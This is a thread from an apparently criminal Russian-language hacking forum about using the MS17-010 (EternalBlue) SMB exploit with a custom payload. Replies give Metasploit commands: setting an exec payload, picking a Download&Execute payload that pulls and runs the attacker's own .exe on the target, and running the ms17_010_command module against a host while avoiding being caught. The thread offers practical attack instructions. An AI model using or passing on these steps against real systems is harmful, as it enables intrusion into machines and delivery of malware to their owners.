• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc MS17-010 как задать свой пейлоад?

sect adept

(L3) cache
Пользователь
Регистрация
19.02.2022
Сообщения
280
Решения
3
Реакции
73
Привет читающему! Как при атаке MS10-010 задать свой пейлоад, например батник?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Эксп из метасплойта? тогда так
set payload windows/x64/exec
 
Эксп из метасплойта? тогда так
set payload windows/x64/exec
Да, с меты. Спасибо!
 
А если эксп не из меты, а свой? Например bat или exe?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
А если эксп не из меты, а свой? Например bat или exe?
Тогда никак. Как автор его задумал так он и будет работать. Там править шелл-код надо будет, чтобы он делал то, что ты хочешь. Это работа уже для специалиста, который разбирается в бинарной эксплуатации на уровне ядра под windows.
 
А если эксп не из меты, а свой? Например bat или exe?
в set payload выбери нагрузку Download&Execute и укажи ссылку на свой .exe файл
сплойт когда отработает подгрузит на тачку твой файл и запустит его
 
используете сначала этот модуль

Код:
use auxiliary/admin/smb/ms17_010_command
set RHOST 192.168.200.200
set command "cmd.exe /c whoami"

т.к. можете спалится, и выкинуть вас довольно быстро
 
используете сначала этот модуль

Код:
use auxiliary/admin/smb/ms17_010_command
set RHOST 192.168.200.200
set command "cmd.exe /c whoami"

т.к. можете спалится, и выкинуть вас довольно быстро
Если доменного юзера нет то возьникнут сложности с поиском пайпа на ос вин7/2008
 
Если доменного юзера нет то возьникнут сложности с поиском пайпа на ос вин7/2008
согласен, но если так работает, то лучше попробовать сначала, чем грузить файл в неизвестность
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх